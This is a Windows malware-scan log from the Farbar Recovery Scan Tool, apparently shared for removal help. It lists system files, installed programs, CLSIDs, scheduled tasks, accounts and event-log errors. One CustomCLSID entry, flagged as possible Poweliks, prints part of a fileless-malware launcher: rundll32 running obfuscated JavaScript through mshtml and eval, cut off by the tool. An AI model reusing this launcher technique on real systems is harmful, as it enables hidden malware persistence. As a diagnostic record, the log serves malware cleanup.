2014-10-15 13:57 - 2014-09-18 20:20 - 00677888 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-10-15 13:57 - 2014-09-18 20:20 - 00607744 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-15 13:57 - 2014-09-18 20:18 - 01068032 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-10-15 13:57 - 2014-09-18 19:59 - 01810944 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-15 13:57 - 2014-09-18 19:53 - 01190400 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-15 13:57 - 2014-09-18 19:52 - 00678400 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-10-15 13:57 - 2014-09-04 01:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll
2014-10-15 13:57 - 2014-06-18 18:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-15 13:57 - 2014-06-18 18:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2014-10-15 13:57 - 2014-06-18 18:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll
2014-10-15 13:56 - 2014-09-17 21:32 - 02363904 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-10-15 13:56 - 2014-09-12 21:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-10-15 13:56 - 2014-08-18 22:41 - 00050688 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2014-10-15 13:56 - 2014-08-18 22:41 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2014-10-15 13:56 - 2014-08-18 22:41 - 00027648 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2014-10-15 13:56 - 2014-08-18 22:40 - 00096768 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2014-10-15 13:56 - 2014-08-18 22:40 - 00016896 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2014-10-15 13:56 - 2014-08-18 21:48 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2014-10-15 13:56 - 2014-07-16 21:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll
2014-10-15 13:56 - 2014-07-16 21:39 - 03221504 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2014-10-15 13:56 - 2014-07-16 21:39 - 01051136 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2014-10-15 13:56 - 2014-07-16 21:39 - 00523264 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll
2014-10-15 13:56 - 2014-07-16 21:39 - 00304128 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-10-15 13:56 - 2014-07-16 21:39 - 00131584 _____ (Microsoft Corporation) C:\Windows\system32\aaclient.dll
2014-10-15 13:56 - 2014-07-16 21:39 - 00130048 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll
2014-10-15 13:56 - 2014-07-16 21:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-10-15 13:56 - 2014-07-16 21:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-10-15 13:56 - 2014-07-16 21:03 - 00184320 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys
2014-10-15 13:56 - 2014-07-16 21:02 - 00031232 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys
2014-10-15 13:56 - 2014-07-06 21:40 - 11411456 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 03208704 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 01329664 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 01174528 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 01005056 _____ (Microsoft Corporation) C:\Windows\system32\cryptui.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00988160 _____ (Microsoft Corporation) C:\Windows\system32\drmv2clt.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00744960 _____ (Microsoft Corporation) C:\Windows\system32\blackbox.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00617984 _____ (Microsoft Corporation) C:\Windows\system32\wmdrmsdk.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00504320 _____ (Microsoft Corporation) C:\Windows\system32\msscp.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00473600 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00442880 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00406016 _____ (Microsoft Corporation) C:\Windows\system32\drmmgrtn.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00374784 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00354816 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00275968 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00265216 _____ (Microsoft Corporation) C:\Windows\system32\msnetobj.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00179200 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00157184 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00143872 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00103424 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00081408 _____ (Microsoft Corporation) C:\Windows\system32\cryptsp.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00008192 _____ (Microsoft Corporation) C:\Windows\system32\spwmp.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.ocx
2014-10-15 13:56 - 2014-07-06 21:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\dxmasf.dll
2014-10-15 13:56 - 2014-07-06 21:39 - 12625408 _____ (Microsoft Corporation) C:\Windows\system32\wmploc.DLL
2014-10-15 13:56 - 2014-07-06 21:39 - 03970488 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlpa.exe
2014-10-15 13:56 - 2014-07-06 21:39 - 03914680 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2014-10-15 13:56 - 2014-07-06 21:39 - 00100864 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe
2014-10-15 13:56 - 2014-07-06 21:39 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe
2014-10-15 13:56 - 2014-07-06 21:39 - 00023040 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe
2014-10-15 13:56 - 2014-07-06 21:37 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll
2014-10-15 13:56 - 2014-07-06 21:28 - 00593920 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\PEAuth.sys
2014-10-15 13:56 - 2014-06-27 20:21 - 00521384 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2014-10-15 13:56 - 2014-06-27 20:21 - 00455752 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe
2014-10-15 13:56 - 2014-06-27 20:21 - 00409272 _____ (Microsoft Corporation) C:\Windows\system32\ci.dll
2014-10-01 09:16 - 2014-09-24 21:40 - 00519680 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-10-28 10:00 - 2011-03-21 11:19 - 00000882 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-10-28 10:00 - 2010-12-29 18:48 - 00073034 _____ () C:\Windows\PFRO.log
2014-10-28 10:00 - 2009-07-14 00:53 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-10-28 10:00 - 2009-07-14 00:39 - 00093295 _____ () C:\Windows\setupact.log
2014-10-28 09:59 - 2010-10-16 12:07 - 01671214 _____ () C:\Windows\WindowsUpdate.log
2014-10-28 09:57 - 2009-07-13 22:04 - 00000215 _____ () C:\Windows\system.ini
2014-10-28 09:42 - 2014-06-04 10:57 - 00000556 _____ () C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-3621039740-3434257137-3815352865-1001.job
2014-10-28 09:38 - 2012-08-29 09:07 - 00002131 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-10-28 09:38 - 2011-03-21 11:19 - 00000886 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-10-28 09:16 - 2012-04-03 09:22 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-10-27 17:26 - 2009-07-14 00:34 - 00021680 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-10-27 17:26 - 2009-07-14 00:34 - 00021680 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-10-27 17:25 - 2009-07-25 08:54 - 00782510 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-10-27 17:20 - 2012-05-01 10:33 - 00000000 ___RD () C:\Users\KELI\Dropbox
2014-10-27 17:19 - 2012-05-01 10:32 - 00000000 ____D () C:\Users\KELI\AppData\Roaming\Dropbox
2014-10-27 16:37 - 2009-07-13 22:37 - 00000000 ___RD () C:\Users\Public
2014-10-27 15:49 - 2014-06-04 10:56 - 00000000 ____D () C:\Users\KELI\AppData\Local\Citrix
2014-10-27 09:28 - 2012-01-10 10:25 - 00000316 _____ () C:\Windows\Tasks\HPCeeScheduleForKELI.job
2014-10-23 11:03 - 2009-07-14 00:52 - 00000000 ____D () C:\Windows\system32\FxsTmp
2014-10-22 09:16 - 2010-10-16 12:11 - 00000000 ____D () C:\ProgramData\PDFC
2014-10-16 11:53 - 2010-12-29 18:49 - 00000000 ____D () C:\Scans
2014-10-16 10:24 - 2009-07-13 22:37 - 00000000 ____D () C:\Windows\rescache
2014-10-16 09:58 - 2009-07-13 22:37 - 00000000 ____D () C:\Windows\Microsoft.NET
2014-10-16 09:27 - 2012-01-17 10:31 - 00000000 _____ () C:\Windows\system32\HP_ActiveX_Patch_NOT_DETECTED.txt
2014-10-16 09:27 - 2011-04-12 09:27 - 00000052 _____ () C:\Windows\system32\DOErrors.log
2014-10-16 09:13 - 2009-07-14 00:33 - 00401032 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-16 09:12 - 2014-05-06 16:59 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-10-15 16:55 - 2013-08-14 17:10 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-15 16:52 - 2011-03-21 09:13 - 100290944 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-10-02 15:53 - 2011-03-21 11:46 - 00231568 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
 
Some content of TEMP:
====================
C:\Users\KELI\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpyafstv.dll
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-10-27 18:50
 
==================== End Of Log ============================
 
ADDITION.TXT
 
Additional scan result of Farbar Recovery Scan Tool (x86) Version: 27-10-2014 01
Ran by KELI at 2014-10-28 10:02:22
Running from C:\Users\KELI\Desktop
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: McAfee® Total Protection™ for Small Business (Disabled - Out of date) {86355677-4064-3EA7-ABB3-1B136EB04637}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: McAfee® Total Protection™ for Small Business (Disabled - Out of date) {3D54B793-665E-3129-9103-206115370C8A}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
Adobe AIR (HKLM\...\Adobe AIR) (Version: 2.6.0.19140 - Adobe Systems Incorporated)
Adobe Flash Player 15 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Reader X (10.1.10) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.10 - Adobe Systems Incorporated)
Bing Bar (HKLM\...\{08234a0d-cf39-4dca-99f0-0c5cb496da81}) (Version: 6.0.2237.0 - Microsoft Corporation)
Bing Bar Platform (Version: 6.0.2237.0 - Microsoft Corporation) Hidden
Bing Rewards Client Installer (Version: 16.0.345.0 - Microsoft Corporation) Hidden
Citrix Online Launcher (HKLM\...\{F17C3DC2-2ACA-4B0E-BDBF-ACE61B14E7CD}) (Version: 1.0.183 - Citrix)
Dropbox (HKCU\...\Dropbox) (Version: 2.10.30 - Dropbox, Inc.)
Google Chrome (HKLM\...\Google Chrome) (Version: 38.0.2125.111 - Google Inc.)
Google Earth Plug-in (HKLM\...\{4AB54F11-2F8C-11E3-B09F-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google)
Google Toolbar for Internet Explorer (HKLM\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.5111.1712 - Google Inc.)
Google Toolbar for Internet Explorer (Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (Version: 1.3.25.5 - Google Inc.) Hidden
GoToMeeting 6.4.5.1865 (HKCU\...\GoToMeeting) (Version: 6.4.5.1865 - CitrixOnline)
Hewlett-Packard ACLM.NET v1.2.2.3 (Version: 1.00.0000 - Hewlett-Packard Company) Hidden
HP Customer Experience Enhancements (Version: 6.0.1.8 - Hewlett-Packard) Hidden
HP Setup (HKLM\...\{1E6219D4-027E-47EE-AB83-DD2F26E31A32}) (Version: 1.2.3557.3169 - Hewlett-Packard)
HP Vision Hardware Diagnostics (HKLM\...\{D79A02E9-6713-4335-9668-AAC7474C0C0E}) (Version: 2.1.4.0 - Hewlett-Packard)
Intel® Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version:  - Intel Corporation)
Intel® Active Management Technology (HKLM\...\MESOL) (Version:  - Intel Corporation)
InterVideo WinDVD 8 (HKLM\...\InstallShield_{5FEBF468-5AC2-4C66-AD80-DF85C085AA73}) (Version: 8.5.10.36 - InterVideo Inc.)
InterVideo WinDVD 8 (Version: 8.5.10.36 - InterVideo Inc.) Hidden
Kyocera Scanner File Utility (HKLM\...\{61C79AE1-5403-4687-AC68-28BFA5EF3895}) (Version: 3.16.9 - KyoceraMita)
Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)
McAfee Browser Protection Service (HKLM\...\McAfee SiteAdvisor) (Version: 2.5.0.6173 - McAfee, Inc.)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office 2010 (HKLM\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Basic 2007 (HKLM\...\BASICR) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 4.0.50401.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
PDF Complete Special Edition (HKLM\...\PDF Complete) (Version: 3.5.109 - PDF Complete, Inc)
Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5886 - Realtek Semiconductor Corp.)
Sophos Virus Removal Tool (HKLM\...\{B829E117-D072-41EA-9606-9826A38D34C1}) (Version: 2.5.3 - Sophos Limited)
Windows Live ID Sign-in Assistant (HKLM\...\{0840B4D6-7DD1-4187-8523-E6FC0007EFB7}) (Version: 6.500.3165.0 - Microsoft Corporation)
WordPerfect Office 11 (HKLM\...\{54F90B55-BEB3-4F0D-8802-228822FA5921}) (Version: 11.0 - Corel Corporation)
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
CustomCLSID: HKU\S-1-5-21-3621039740-3434257137-3815352865-1001_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\KELI\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3621039740-3434257137-3815352865-1001_Classes\CLSID\{84B5A313-CD5D-4904-8BA2-AFDC81C1B309}\InprocServer32 -> C:\Users\KELI\AppData\Local\Citrix\GoToMeeting\1350\G2MOutlookAddin.dll (Citrix Online, a division of Citrix Systems, Inc.)
CustomCLSID: HKU\S-1-5-21-3621039740-3434257137-3815352865-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-3621039740-3434257137-3815352865-1001_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\KELI\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3621039740-3434257137-3815352865-1001_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\KELI\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3621039740-3434257137-3815352865-1001_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\KELI\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3621039740-3434257137-3815352865-1001_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\KELI\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3621039740-3434257137-3815352865-1001_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\KELI\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3621039740-3434257137-3815352865-1001_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\KELI\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3621039740-3434257137-3815352865-1001_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\KELI\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3621039740-3434257137-3815352865-1001_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\KELI\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
 
==================== Restore Points  =========================
 
28-10-2014 13:40:22 ComboFix created restore point
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2009-07-13 22:04 - 2014-10-28 09:22 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1       localhost
 
==================== Scheduled Tasks (whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {0C92239F-3E49-499D-9AF1-C4B116AD46BB} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [2014-10-27] (Google Inc.)
Task: {21866111-A928-4F98-AF0C-EEAE9A8E1996} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files\Hewlett-Packard\HP Support Framework\HPSF.exe [2013-11-04] (Hewlett-Packard Company)
Task: {67385F60-249C-4354-ADD2-620471A359CC} - System32\Tasks\G2MUpdateTask-S-1-5-21-3621039740-3434257137-3815352865-1001 => C:\Users\KELI\AppData\Local\Citrix\GoToMeeting\1865\g2mupdate.exe [2014-10-27] (Citrix Online, a division of Citrix Systems, Inc.)
Task: {7375CCFD-6B94-41ED-961E-F6F9C08DAFA6} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-24] (Adobe Systems Incorporated)
Task: {7F504C59-599B-49DA-A3EE-B859AC0BF85C} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files\Hewlett-Packard\HP Support Framework\HPSF.exe [2013-11-04] (Hewlett-Packard Company)
Task: {87C410B8-33B3-45C6-B500-AD9A206C9502} - System32\Tasks\HPCeeScheduleForKELI => C:\Program Files\Hewlett-Packard\HP Ceement\HPCEE.exe [2011-07-15] (Hewlett-Packard)
Task: {8A443DB3-B5C1-48D7-B440-F451210C0D61} - System32\Tasks\Registration => C:\Program Files\Hewlett-Packard\HP Setup\RemEngine.exe [2009-10-06] ()
Task: {AB8E1262-14E5-4EA0-9F63-97672EDA7F30} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [2014-10-27] (Google Inc.)
Task: {EA69A0AE-1152-488A-9731-1437A029D2F6} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater7\HPSFUpdater.exe [2014-05-12] (Hewlett-Packard Company)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-3621039740-3434257137-3815352865-1001.job => C:\Users\KELI\AppData\Local\Citrix\GoToMeeting\1865\g2mupdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\HPCeeScheduleForKELI.job => C:\Program Files\Hewlett-Packard\HP Ceement\HPCEE.exe
 
==================== Loaded Modules (whitelisted) =============
 
2010-10-16 12:15 - 2010-10-16 12:15 - 00341280 _____ () C:\Program Files\SiteAdvisor\6173\SAService.exe
2010-10-16 12:07 - 2009-07-24 15:29 - 00077824 _____ () C:\Program Files\Common Files\Intel\Privacy Icon\UNS\DTMessageLib.dll
2010-10-16 12:15 - 2007-08-28 16:07 - 00036640 _____ () C:\Program Files\SiteAdvisor\6173\SiteAdv.exe
2010-10-16 12:15 - 2007-08-28 16:06 - 00910624 _____ () C:\Program Files\SiteAdvisor\6173\SiteAdv.dll
2011-03-24 20:16 - 2000-11-09 11:17 - 00190464 _____ () C:\Program Files\Kyocera\FileUtility\HgTiff2Pdf.dll
2014-10-28 10:01 - 2014-10-28 10:01 - 00043008 _____ () c:\users\keli\appdata\local\temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpyafstv.dll
2013-08-23 15:01 - 2013-08-23 15:01 - 25100288 _____ () C:\Users\KELI\AppData\Roaming\Dropbox\bin\libcef.dll
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== EXE Association (whitelisted) =============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== MSCONFIG/TASK MANAGER disabled items =========
 
(Currently there is no automatic fix for this section.)
 
 
========================= Accounts: ==========================
 
Administrator (S-1-5-21-3621039740-3434257137-3815352865-500 - Administrator - Disabled)
Guest (S-1-5-21-3621039740-3434257137-3815352865-501 - Limited - Enabled)
KELI (S-1-5-21-3621039740-3434257137-3815352865-1001 - Administrator - Enabled) => C:\Users\KELI
McAfeeMVSUser (S-1-5-21-3621039740-3434257137-3815352865-1000 - Limited - Enabled)
 
==================== Faulty Device Manager Devices =============
 
Name: PS/2 Compatible Mouse
Description: PS/2 Compatible Mouse
Class Guid: {4d36e96f-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: i8042prt
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.
 
Name: Standard PS/2 Keyboard
Description: Standard PS/2 Keyboard
Class Guid: {4d36e96b-e325-11ce-bfc1-08002be10318}
Manufacturer: (Standard keyboards)
Service: i8042prt
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (10/27/2014 06:52:13 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "Microsoft.VC80.MFC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50727.762"1".
Dependent Assembly Microsoft.VC80.MFC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50727.762" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (10/27/2014 04:21:19 PM) (Source: System Restore) (EventID: 8193) (User: )
Description: Failed to create restore point (Process = C:\Windows\system32\wbem\wmiprvse.exe; Description = ComboFix created restore point; Error = 0x8007043c).
 
Error: (10/27/2014 04:21:19 PM) (Source: VSS) (EventID: 8193) (User: )
Description: Volume Shadow Copy Service error: Unexpected error calling routine CoCreateInstance.  hr = 0x8007043c, This service cannot be started in Safe Mode
.
 
 
Operation:
   Instantiating VSS server
 
Error: (10/27/2014 04:21:19 PM) (Source: VSS) (EventID: 18) (User: )
Description: Volume Shadow Copy Service error: The COM Server with CLSID {e579ab5f-1cc4-44b4-bed9-de0991ff0623} and name IVssCoordinatorEx2 cannot be started during Safe Mode.
The Volume Shadow Copy service cannot start while in safe mode. [0x8007043c, This service cannot be started in Safe Mode
]
 
 
Operation:
   Instantiating VSS server
 
Error: (10/27/2014 04:17:20 PM) (Source: System Restore) (EventID: 8193) (User: )
Description: Failed to create restore point (Process = C:\Windows\system32\wbem\wmiprvse.exe; Description = ComboFix created restore point; Error = 0x8007043c).
 
Error: (10/27/2014 04:17:20 PM) (Source: VSS) (EventID: 8193) (User: )
Description: Volume Shadow Copy Service error: Unexpected error calling routine CoCreateInstance.  hr = 0x8007043c, This service cannot be started in Safe Mode
.
 
 
Operation:
   Instantiating VSS server
 
Error: (10/27/2014 04:17:19 PM) (Source: VSS) (EventID: 18) (User: )
Description: Volume Shadow Copy Service error: The COM Server with CLSID {e579ab5f-1cc4-44b4-bed9-de0991ff0623} and name IVssCoordinatorEx2 cannot be started during Safe Mode.
